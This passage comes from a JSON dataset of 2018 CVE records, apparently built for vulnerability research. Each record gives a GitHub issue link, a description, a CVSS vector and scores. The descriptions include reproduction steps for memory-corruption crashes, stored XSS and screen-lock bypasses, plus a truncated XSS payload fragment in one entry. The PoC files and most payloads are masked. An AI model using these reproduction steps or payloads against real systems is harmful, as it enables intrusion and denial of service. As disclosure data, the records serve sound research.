  30246. "description": "Heap buffer overflow problem in APITAG function in util/decompile.c of libming NUMBERTAG Hi, there. A Heap buffer overflow problem was discovered in APITAG function in util/decompile.c of libming NUMBERTAG This problem can be reproduced in the latest code base, too. A crafted input can cause segment faults and I have confirmed them with address sanitizer too. Here is the POC file. Please use the \"./swftocxx $POC /dev/null\" to reproduce the bug. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  30247. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30248. "severity": "MEDIUM",
  30249. "baseScore": 6.5,
  30250. "impactScore": 3.6,
  30251. "exploitabilityScore": 2.8
  30252. },
  30253. {
  30254. "CVE_ID": "CVE-2018-20592",
  30255. "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/237",
  30256. "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/237",
  30257. "Repo_new": "michaelrsweet/mxml",
  30258. "Issue_Created_At": "2018-12-13T05:48:57Z",
  30259. "description": "Multiple crashes when running xmldoc. We detected several crashes with our fuzzer when mxml is compiled with APITAG including buffer overflow (heap based or stack based), and use after free. POCs (files ending with APITAG ) and error messages (files ending with APITAG ) are put inside this directory URLTAG . The triggering command is APITAG (w/o setting xml, POC is the \"source file\").",
  30260. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30261. "severity": "MEDIUM",
  30262. "baseScore": 5.5,
  30263. "impactScore": 3.6,
  30264. "exploitabilityScore": 1.8
  30265. },
  30266. {
  30267. "CVE_ID": "CVE-2018-20594",
  30268. "Issue_Url_old": "https://github.com/hs-web/hsweb-framework/issues/107",
  30269. "Issue_Url_new": "https://github.com/hs-web/hsweb-framework/issues/107",
  30270. "Repo_new": "hs-web/hsweb-framework",
  30271. "Issue_Created_At": "2018-12-29T02:57:09Z",
  30272. "description": "\u5b89\u5168\u95ee\u9898. \u60a8\u597d\uff1a APITAG framework\u4e2d\u5b58\u5728\u5982\u4e0b\u4e09\u4e2a\u5b89\u5168\u95ee\u9898\u3002 \u4e00\uff1a\u53cd\u5c04\u578bxss NUMBERTAG FILETAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG csrf NUMBERTAG FILETAG APITAG NUMBERTAG FILETAG PATHTAG NUMBERTAG",
  30273. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30274. "severity": "MEDIUM",
  30275. "baseScore": 6.1,
  30276. "impactScore": 2.7,
  30277. "exploitabilityScore": 2.8
  30278. },
  30279. {
  30280. "CVE_ID": "CVE-2018-20616",
  30281. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/4",
  30282. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/4",
  30283. "Repo_new": "brackeen/ok-file-formats",
  30284. "Issue_Created_At": "2018-12-31T11:53:39Z",
  30285. "description": "heap buffer overflow in ok file APITAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG Asan Debug Information ERRORTAG POC file CVETAG",
  30286. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30287. "severity": "HIGH",
  30288. "baseScore": 8.8,
  30289. "impactScore": 5.9,
  30290. "exploitabilityScore": 2.8
  30291. },
  30292. {
  30293. "CVE_ID": "CVE-2018-20617",
  30294. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/5",
  30295. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/5",
  30296. "Repo_new": "brackeen/ok-file-formats",
  30297. "Issue_Created_At": "2018-12-31T13:20:47Z",
  30298. "description": "heap buffer overflow in /ok file APITAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG $ gcc o csv_decode csv_decode.c ok_csv.h ok_csv.c Asan Debug Information ERRORTAG POC file CVETAG",
  30299. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30300. "severity": "HIGH",
  30301. "baseScore": 8.8,
  30302. "impactScore": 5.9,
  30303. "exploitabilityScore": 2.8
  30304. },
  30305. {
  30306. "CVE_ID": "CVE-2018-20618",
  30307. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/6",
  30308. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/6",
  30309. "Repo_new": "brackeen/ok-file-formats",
  30310. "Issue_Created_At": "2018-12-31T13:55:19Z",
  30311. "description": "heap buffer overflow in PATHTAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG $ gcc o mo_decode mo_decode.c ok_mo.h ok_mo.c Asan Debug Information ERRORTAG POC file CVETAG",
  30312. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30313. "severity": "HIGH",
  30314. "baseScore": 8.8,
  30315. "impactScore": 5.9,
  30316. "exploitabilityScore": 2.8
  30317. },
  30318. {
  30319. "CVE_ID": "CVE-2018-20652",
  30320. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/104",
  30321. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/104",
  30322. "Repo_new": "syoyo/tinyexr",
  30323. "Issue_Created_At": "2018-12-31T13:56:35Z",
  30324. "description": "Program crash due to Out of memory in function APITAG Hi, there. I test the program at the master branch. CODETAG An Out of Memory problem was discovered in function APITAG in tinyexr.h. The program tries to allocate with a large number size NUMBERTAG b NUMBERTAG b NUMBERTAG bytes) of memory. Program crash because of terminating called after throwing an instance of 'std::bad_alloc' Please use the \"./test_tinyexr $POC\" to reproduce the bug. FILETAG I will show you the output as follow. APITAG",
  30325. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30326. "severity": "MEDIUM",
  30327. "baseScore": 6.5,
  30328. "impactScore": 3.6,
  30329. "exploitabilityScore": 2.8
  30330. },
  30331. {
  30332. "CVE_ID": "CVE-2018-20659",
  30333. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/350",
  30334. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/350",
  30335. "Repo_new": "axiomatic-systems/bento4",
  30336. "Issue_Created_At": "2018-12-31T15:52:26Z",
  30337. "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash7.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  30338. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30339. "severity": "MEDIUM",
  30340. "baseScore": 6.5,
  30341. "impactScore": 3.6,
  30342. "exploitabilityScore": 2.8
  30343. },
  30344. {
  30345. "CVE_ID": "CVE-2018-20663",
  30346. "Issue_Url_old": "https://github.com/cuba-platform/reports/issues/140",
  30347. "Issue_Url_new": "https://github.com/cuba-platform/reports/issues/140",
  30348. "Repo_new": "cuba-platform/reports",
  30349. "Issue_Created_At": "2018-12-21T13:58:43Z",
  30350. "description": "Permanent XSS attack through . APITAG Environment Platform version NUMBERTAG APITAG APITAG Client type: Web APITAG Browser: tested in Firefox and Chrome APITAG Description of the bug or enhancement Login and navigate to APITAG > Reports_ Click APITAG > New_ In the name field, type ERRORTAG Click APITAG and close_ Edit the newly created report by double click or click & Edit Hover mouse over the tab with the text APITAG report \"<img src=x o..._ FILETAG Expected behavior: nothing happens Actual behavior: javascript code is executed FILETAG",
  30351. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  30352. "severity": "MEDIUM",
  30353. "baseScore": 5.4,
  30354. "impactScore": 2.7,
  30355. "exploitabilityScore": 2.3
  30356. },
  30357. {
  30358. "CVE_ID": "CVE-2018-20676",
  30359. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27044",
  30360. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27044",
  30361. "Repo_new": "twbs/bootstrap",
  30362. "Issue_Created_At": "2018-08-10T09:04:03Z",
  30363. "description": "tooltip XSS on data viewport attribute. found in bootstrap NUMBERTAG APITAG \" APITAG over me APITAG URLTAG Win NUMBERTAG Chrome NUMBERTAG Firefo NUMBERTAG Bit)",
  30364. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30365. "severity": "MEDIUM",
  30366. "baseScore": 6.1,
  30367. "impactScore": 2.7,
  30368. "exploitabilityScore": 2.8
  30369. },
  30370. {
  30371. "CVE_ID": "CVE-2018-20677",
  30372. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27045",
  30373. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27045",
  30374. "Repo_new": "twbs/bootstrap",
  30375. "Issue_Created_At": "2018-08-10T09:07:08Z",
  30376. "description": "affix XSS on target config. found in bootstrap NUMBERTAG ERRORTAG URLTAG Win NUMBERTAG Chrome NUMBERTAG Firefo NUMBERTAG Bit)",
  30377. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30378. "severity": "MEDIUM",
  30379. "baseScore": 6.1,
  30380. "impactScore": 2.7,
  30381. "exploitabilityScore": 2.8
  30382. },
  30383. {
  30384. "CVE_ID": "CVE-2018-20680",
  30385. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/22",
  30386. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/22",
  30387. "Repo_new": "philippe/frogcms",
  30388. "Issue_Created_At": "2018-12-31T07:53:42Z",
  30389. "description": "Frog CMS NUMBERTAG has xss in PATHTAG body field. Frog CMS NUMBERTAG has xss in PATHTAG body field NUMBERTAG login APITAG exp ERRORTAG FILETAG NUMBERTAG save and close NUMBERTAG open FILETAG FILETAG",
  30390. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  30391. "severity": "MEDIUM",
  30392. "baseScore": 4.8,
  30393. "impactScore": 2.7,
  30394. "exploitabilityScore": 1.7
  30395. },
  30396. {
  30397. "CVE_ID": "CVE-2018-20681",
  30398. "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/170",
  30399. "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/170",
  30400. "Repo_new": "mate-desktop/mate-screensaver",
  30401. "Issue_Created_At": "2018-09-14T04:52:26Z",
  30402. "description": "Lock Screen not working after monitor plugged / unplugged (need to restart mate screensaver). Expected behaviour When unplug / unplug the monitor, Lock Screen should work like before Actual behaviour When unplug / unplug the monitor, Lock Screen does not work unless I restart mate screensaver Steps to reproduce the behaviour Login to MATE with a laptop while external monitor is attached via HDMI Select from menu: System > Lock Screen > It works, now we unlock the screen Unplug the HDMI cable Select from menu: System > Lock Screen > nothing happens Run APITAG Select from menu: System > Lock Screen > It works again MATE general version NUMBERTAG Package version mate screensaver NUMBERTAG Linux Distribution Linux Mint NUMBERTAG Tara Link to downstream report of your Distribution",
  30403. "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  30404. "severity": "MEDIUM",
  30405. "baseScore": 6.1,
  30406. "impactScore": 5.2,
  30407. "exploitabilityScore": 0.9
  30408. },
  30409. {
  30410. "CVE_ID": "CVE-2018-20681",
  30411. "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/155",
  30412. "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/155",
  30413. "Repo_new": "mate-desktop/mate-screensaver",
  30414. "Issue_Created_At": "2018-05-01T20:44:51Z",
  30415. "description": "mate screensaver screen lock can be bypassed by power cycling monitor. Expected behaviour Lock Screen Turn off monitor Turn monitor on Start typing Expect to see lock screen on monitor Actual behaviour Lock Screen Turn off monitor Turn monitor on Start typing Expect to see lock screen on monitor Steps to reproduce the behaviour CODETAG Wait NUMBERTAG seconds Lock screen (I used Window manager shortcut) Wait NUMBERTAG seconds Power off monitor (soft off) Wait NUMBERTAG seconds Power on monitor Wait NUMBERTAG seconds (that's how long it takes monitor to boot) Can see and use PATHTAG it is (effectively) unlocked. Notes/logs: APITAG reports: after APITAG Screensaver is not running! ERRORTAG The screensaver is inactive APITAG The screensaver is not inhibited APITAG The screensaver is active APITAG The screensaver is not inhibited APITAG mate screensaver no daemon debug` FILETAG Wait NUMBERTAG seconds Lock screen (I used Window manager shortcut) FILETAG Wait NUMBERTAG seconds Power off monitor (soft off) FILETAG FILETAG Wait NUMBERTAG seconds Power on monitor FILETAG FILETAG Wait NUMBERTAG seconds (that's how long it takes monitor to boot) Can see and use PATHTAG it is (effectively) unlocked. FILETAG (there is no FILETAG or FILETAG or FILETAG (blank during that time)) Troubleshooting This occurred on two machines. Home Machine Problem occurred on Ubuntu NUMBERTAG do not have logs unfortunately) Unsure what version of mate it was at the time If relevant monitor was NUMBERTAG Uses nvidia drivers Upgrading to Ubuntu NUMBERTAG which upgraded mate to NUMBERTAG fixed the problem on home machine. Work Machine Problem occurred on Ubuntu NUMBERTAG mate NUMBERTAG do not have logs unfortunately) Upgrading to Ubuntu NUMBERTAG mate NUMBERTAG did NOT fix the problem. If relevant monitor is NUMBERTAG Problem still occurs if I switch to different resolution Has no dedicated video card/using intel onboard graphics monitor is a USB hub.. problem still reproduces if I disconnect the usb cable and have the keyboard connected some other way. Please let me know what other logs/steps may be useful. MATE general version NUMBERTAG Package version mate screensaver NUMBERTAG See attached FILETAG for full list of all mate related package versions Linux Distribution Ubuntu NUMBERTAG",
  30416. "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  30417. "severity": "MEDIUM",
  30418. "baseScore": 6.1,
  30419. "impactScore": 5.2,
  30420. "exploitabilityScore": 0.9
  30421. },
  30422. {
  30423. "CVE_ID": "CVE-2018-20681",
  30424. "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/152",
  30425. "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/152",
  30426. "Repo_new": "mate-desktop/mate-screensaver",
  30427. "Issue_Created_At": "2018-04-10T19:53:17Z",
  30428. "description": "mate screensaver does not maintain user lockout / screen lock under certain conditions. Expected behaviour mate screensaver should keep the user's session locked until valid authentication has taken place (password entered, etc.) Actual behaviour & steps to reproduce the behaviour Do the following NUMBERTAG Have two display port attached displays on a fresh install of Fedora NUMBERTAG Mine are in ports NUMBERTAG in case that makes any difference. Login to MATE NUMBERTAG Press ctrl alt L or allow the screensaver timeout to lock the screen NUMBERTAG a. Bump the mouse or type a key on the keyboard before the displays have either been placed into power save mode or put to sleep: < MATE presents the password prompt and the user's windows remain hidden until the password has been correctly entered NUMBERTAG b. Bump the mouse or type a key on the keyboard after the displays have been put into power save mode, but before they have been put to sleep: < MATE presents the unlock with password prompt, but displays (doesn't hide) the windows of your desktop. You cannot interact with the applications or windows until the password has been correctly entered, but the content is plainly visible as described by other users in this bug NUMBERTAG c. Bump the mouse to type a key on the keyboard after the displays have been put to sleep: < MATE blanks one display where the password dialog box would have been, the other is available for interaction WITHOUT having entered in the correct password. New applications can be launched, all applications may be used with the same privilege level of the user who had previously logged in and believed that their desktop was locked. > MATE general version NUMBERTAG Package version CODETAG Linux Distribution Fedora NUMBERTAG Link to downstream report of your Distribution I may have to open a new bug with Fedora / RH since I didn't open this one originally > CVETAG",
  30429. "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  30430. "severity": "MEDIUM",
  30431. "baseScore": 6.1,
  30432. "impactScore": 5.2,
  30433. "exploitabilityScore": 0.9
  30434. },
  30435. {
  30436. "CVE_ID": "CVE-2018-20723",
  30437. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2215",
  30438. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2215",
  30439. "Repo_new": "cacti/cacti",
  30440. "Issue_Created_At": "2018-12-16T05:07:28Z",
  30441. "description": "Stored XSS in APITAG field Color . Description There's no escape being done before printing out the value of Name in the Color Template page. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Name field value. Payload ERRORTAG Visit URLTAG the payload will be triggered. APITAG APITAG APITAG",
  30442. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  30443. "severity": "MEDIUM",
  30444. "baseScore": 4.8,
  30445. "impactScore": 2.7,
  30446. "exploitabilityScore": 1.7
  30447. },
  30448. {
  30449. "CVE_ID": "CVE-2018-20724",
  30450. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2212",
  30451. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2212",
  30452. "Repo_new": "cacti/cacti",
  30453. "Issue_Created_At": "2018-12-15T11:31:18Z",
  30454. "description": "Stored XSS in APITAG Hostname\" field. Description There's no escape being done before printing out the value of Hostname value in the Data collectors table. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Hostname field value. Payload ERRORTAG Visit FILETAG payload will be triggered. APITAG APITAG APITAG",
  30455. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  30456. "severity": "MEDIUM",
  30457. "baseScore": 4.8,
  30458. "impactScore": 2.7,
  30459. "exploitabilityScore": 1.7
  30460. },
  30461. {
  30462. "CVE_ID": "CVE-2018-20725",
  30463. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2214",
  30464. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2214",
  30465. "Repo_new": "cacti/cacti",
  30466. "Issue_Created_At": "2018-12-16T05:03:25Z",
  30467. "description": "Stored XSS in APITAG Label\" field Graph. Description There's no escape being done before printing out the value of Vertical Label in the Graphic templates page. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Vertical label field value. Payload ERRORTAG Visit FILETAG the payload will be triggered. APITAG APITAG APITAG",
  30468. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  30469. "severity": "MEDIUM",
  30470. "baseScore": 4.8,
  30471. "impactScore": 2.7,
  30472. "exploitabilityScore": 1.7
  30473. },
  30474. {
  30475. "CVE_ID": "CVE-2018-20726",
  30476. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2213",
  30477. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2213",
  30478. "Repo_new": "cacti/cacti",
  30479. "Issue_Created_At": "2018-12-16T04:56:37Z",
  30480. "description": "Stored XSS in APITAG Hostname\" field Data collectors . Description There's no escape being done before printing out the value of Hostname value in the Tree table. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Hostname field value. Payload ERRORTAG Visit URLTAG payload will be triggered. APITAG APITAG APITAG",
  30481. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  30482. "severity": "MEDIUM",
  30483. "baseScore": 5.4,
  30484. "impactScore": 2.7,
  30485. "exploitabilityScore": 2.3
  30486. },
  30487. {
  30488. "CVE_ID": "CVE-2018-20742",
  30489. "Issue_Url_old": "https://github.com/ucbrise/opaque/issues/66",
  30490. "Issue_Url_new": "https://github.com/mc2-project/opaque-sql/issues/66",
  30491. "Repo_new": "mc2-project/opaque-sql",
  30492. "Issue_Created_At": "2018-12-01T08:19:39Z",
  30493. "description": "Security: No boundary check on APITAG . CODETAG APITAG could be a pointer to memory in enclave. It could casue a arbitrary memory write in enclave. Fix\uff1a Add a wrapper function of APITAG , checking the returned value with APITAG / sgx_is_outside_enclave . There is a sample below. ERRORTAG",
  30494. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  30495. "severity": "HIGH",
  30496. "baseScore": 7.5,
  30497. "impactScore": 3.6,
  30498. "exploitabilityScore": 3.9
  30499. },
  30500. {
  30501. "CVE_ID": "CVE-2018-20743",
  30502. "Issue_Url_old": "https://github.com/mumble-voip/mumble/issues/3505",
  30503. "Issue_Url_new": "https://github.com/mumble-voip/mumble/issues/3505",
  30504. "Repo_new": "mumble-voip/mumble",
  30505. "Issue_Created_At": "2018-08-27T15:48:38Z",
  30506. "description": "Rate limiting of channel joins. Malicious clients that are rapidly muting/unmuting, switching channels or posting text Messages (couple hundred times per second) are able to cause server instabilities: the murmur server simply hangs after a few seconds. We suspect the sqlite database to be the bottleneck that causes this behavior, but have no way to verify this, as attacks occur irregulary and only lasts for short amounts of time. Is there a way to rate limit such requests? External processes via ICE are not working for this purpose, as the server locks up regardless.",
  30507. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  30508. "severity": "HIGH",
  30509. "baseScore": 7.5,
  30510. "impactScore": 3.6,
  30511. "exploitabilityScore": 3.9
  30512. },
  30513. {
  30514. "CVE_ID": "CVE-2018-20744",
  30515. "Issue_Url_old": "https://github.com/rs/cors/issues/55",
  30516. "Issue_Url_new": "https://github.com/rs/cors/issues/55",
  30517. "Repo_new": "rs/cors",
  30518. "Issue_Created_At": "2018-05-12T08:14:21Z",
  30519. "description": "CORS security: reflecting any origin header value when configured to is dangerous. When CORS policy is configured to APITAG \"), current go CORS handler will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past. Some similar security issues: URLTAG URLTAG Some related blog posts: FILETAG URLTAG",
  30520. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  30521. "severity": "MEDIUM",
  30522. "baseScore": 5.9,
  30523. "impactScore": 3.6,
  30524. "exploitabilityScore": 2.2
  30525. },
  30526. {
  30527. "CVE_ID": "CVE-2018-20745",
  30528. "Issue_Url_old": "https://github.com/yiisoft/yii2/issues/16193",
  30529. "Issue_Url_new": "https://github.com/yiisoft/yii2/issues/16193",
  30530. "Repo_new": "yiisoft/yii2",
  30531. "Issue_Created_At": "2018-04-29T14:01:17Z",
  30532. "description": "CORS security: reflecting any origin header value when configured to is dangerous. When CORS policy is configured to , current Yii2 CORS filter will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past. Some similar security issues: URLTAG URLTAG URLTAG URLTAG Some related blog posts: FILETAG URLTAG URLTAG",
  30533. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  30534. "severity": "MEDIUM",
  30535. "baseScore": 5.9,
  30536. "impactScore": 3.6,
  30537. "exploitabilityScore": 2.2
  30538. },
  30539. {
  30540. "CVE_ID": "CVE-2018-20748",
  30541. "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/273",
  30542. "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/273",
  30543. "Repo_new": "libvnc/libvncserver",
  30544. "Issue_Created_At": "2018-12-13T10:37:17Z",
  30545. "description": "SECURITY: malloc((uint NUMBERTAG t)length NUMBERTAG is unsafe, especially on NUMBERTAG bit systems. The fixes for NUMBERTAG are incomplete, as I explained in: URLTAG APITAG fix appears to be to add casts to (uint NUMBERTAG t) before adding NUMBERTAG in those many APITAG calls. On platforms with larger than NUMBERTAG bit size_t, this should be sufficient against integer overflows since the sizes are read from NUMBERTAG bit protocol fields, but it isn't sufficient to prevent maliciously large memory allocation on the client by a rogue server. On a platform with NUMBERTAG bit size_t, this isn't even sufficient to prevent the integer overflows.\"",
  30546. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  30547. "severity": "CRITICAL",
  30548. "baseScore": 9.8,
  30549. "impactScore": 5.9,
  30550. "exploitabilityScore": 3.9
  30551. },
  30552. {
  30553. "CVE_ID": "CVE-2018-20755",
  30554. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14102",
  30555. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14102",
  30556. "Repo_new": "modxcms/revolution",
  30557. "Issue_Created_At": "2018-10-02T03:58:45Z",
  30558. "description": "Stored XSS: User Photo. Stored XSS: The application is vulnerable to stored XSS. Step to reproduce Under Manage > Users sources choose Create New User and enter the Xss Payload ERRORTAG in the User Photo field and click on save. The application renders the entered script and displays a pop up whenever the page is being visited by the user. Observed behavior The application processes the html tags or scripts and it is getting stored in the database. Expected behavior It should not accept any scripts or html tags. Environment MODX version:MODX Revolution NUMBERTAG pl",
  30559. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30560. "severity": "MEDIUM",
  30561. "baseScore": 6.1,
  30562. "impactScore": 2.7,
  30563. "exploitabilityScore": 2.8
  30564. },
  30565. {
  30566. "CVE_ID": "CVE-2018-20757",
  30567. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14104",
  30568. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14104",
  30569. "Repo_new": "modxcms/revolution",
  30570. "Issue_Created_At": "2018-10-02T04:10:21Z",
  30571. "description": "Stored XSS: extended user fields. Container name ERRORTAG Attribute name ERRORTAG",
  30572. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30573. "severity": "MEDIUM",
  30574. "baseScore": 6.1,
  30575. "impactScore": 2.7,
  30576. "exploitabilityScore": 2.8
  30577. },
  30578. {
  30579. "CVE_ID": "CVE-2018-20758",
  30580. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14103",
  30581. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14103",
  30582. "Repo_new": "modxcms/revolution",
  30583. "Issue_Created_At": "2018-10-02T04:04:29Z",
  30584. "description": "Stored XSS: User Settings. FILETAG",
  30585. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  30586. "severity": "MEDIUM",
  30587. "baseScore": 5.4,
  30588. "impactScore": 2.7,
  30589. "exploitabilityScore": 2.3
  30590. },
  30591. {
  30592. "CVE_ID": "CVE-2018-20760",
  30593. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1177",
  30594. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1177",
  30595. "Repo_new": "gpac/gpac",
  30596. "Issue_Created_At": "2018-12-13T10:41:00Z",
  30597. "description": "OOB issues of gf_text_get_utf8_line. In gf_text_get_utf8_line function, gf_utf8_wcstombs return NUMBERTAG with crafted srt file, it will cause APITAG NUMBERTAG out of bound write PATHTAG gdb APITAG GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from APITAG (gdb) set args add crafted.srt overview.mp4 (gdb) r Starting program: PATHTAG add crafted.srt overview.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Program received signal SIGBUS, Bus error NUMBERTAG ffff NUMBERTAG b2eeb in gf_text_get_utf8_line APITAG NUMBERTAG APITAG txt_in NUMBERTAG c4e0, unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) bt NUMBERTAG ffff NUMBERTAG b2eeb in gf_text_get_utf8_line APITAG NUMBERTAG APITAG txt_in NUMBERTAG c4e0, unicode_type NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG c6 in gf_text_import_srt (import NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG bd NUMBERTAG in gf_import_timed_text (import NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in gf_media_import (importer NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG a in import_file (dest NUMBERTAG d NUMBERTAG APITAG APITAG import_flags NUMBERTAG force_fps NUMBERTAG frames_per_sample NUMBERTAG at APITAG NUMBERTAG bdac in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG e in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb)",
  30598. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30599. "severity": "HIGH",
  30600. "baseScore": 7.8,
  30601. "impactScore": 5.9,
  30602. "exploitabilityScore": 1.8
  30603. },
  30604. {
  30605. "CVE_ID": "CVE-2018-20761",
  30606. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1186",
  30607. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1186",
  30608. "Repo_new": "gpac/gpac",
  30609. "Issue_Created_At": "2018-12-22T02:44:19Z",
